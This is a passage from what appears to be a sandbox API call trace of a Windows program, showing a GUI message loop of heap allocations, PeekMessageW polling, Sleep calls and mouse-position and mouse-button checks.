(HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.877] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.877] Sleep (dwMilliseconds=0x0) [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.877] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.877] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.877] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.878] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.878] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.878] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.878] Sleep (dwMilliseconds=0x0) [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.878] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.878] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.878] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.879] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.879] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.879] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.879] Sleep (dwMilliseconds=0x0) [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.879] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.879] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.879] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.880] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.880] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.880] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.880] Sleep (dwMilliseconds=0x0) [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.880] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.880] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.880] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.880] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.881] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.881] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.881] Sleep (dwMilliseconds=0x0) [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.881] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.881] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.881] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.881] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.881] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.882] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.882] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.882] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33bc8 [0273.882] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.882] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33aa8 [0273.904] Sleep (dwMilliseconds=0x0) [0273.904] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.904] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.904] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.904] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 1 [0273.904] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8dfb04) returned 0 [0273.904] TranslateMessage (lpMsg=0x8dfb04) returned 0 [0273.904] DispatchMessageW (lpMsg=0x8dfb04) returned 0x0 [0273.904] GetForegroundWindow () returned 0xc0170 [0273.904] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0273.904] GetCursorPos (in: lpPoint=0x8df940 | out: lpPoint=0x8df940*(x=558, y=531)) returned 1 [0273.904] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8df940 | out: lpPoint=0x8df940) returned 1 [0273.904] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x24) returned 0xeebad0 [0273.904] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9220 [0273.904] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33bc8 [0273.904] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33aa8 [0273.904] GetAsyncKeyState (vKey=1) returned 0 [0273.904] GetAsyncKeyState (vKey=2) returned 0 [0273.904] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.904] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.905] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.905] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.905] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33aa8 | out: hHeap=0xcc0000) returned 1 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9220 | out: hHeap=0xcc0000) returned 1 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33bc8 | out: hHeap=0xcc0000) returned 1 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xeebad0 | out: hHeap=0xcc0000) returned 1 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.905] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.905] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.905] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.906] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.906] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.906] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.906] Sleep (dwMilliseconds=0x0) [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.906] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.906] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.906] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.907] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.907] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.907] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.907] Sleep (dwMilliseconds=0x0) [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.907] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.907] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.907] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.908] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.908] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.908] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.908] RtlAllocateHeap (HeapHandle=0xcc0000, 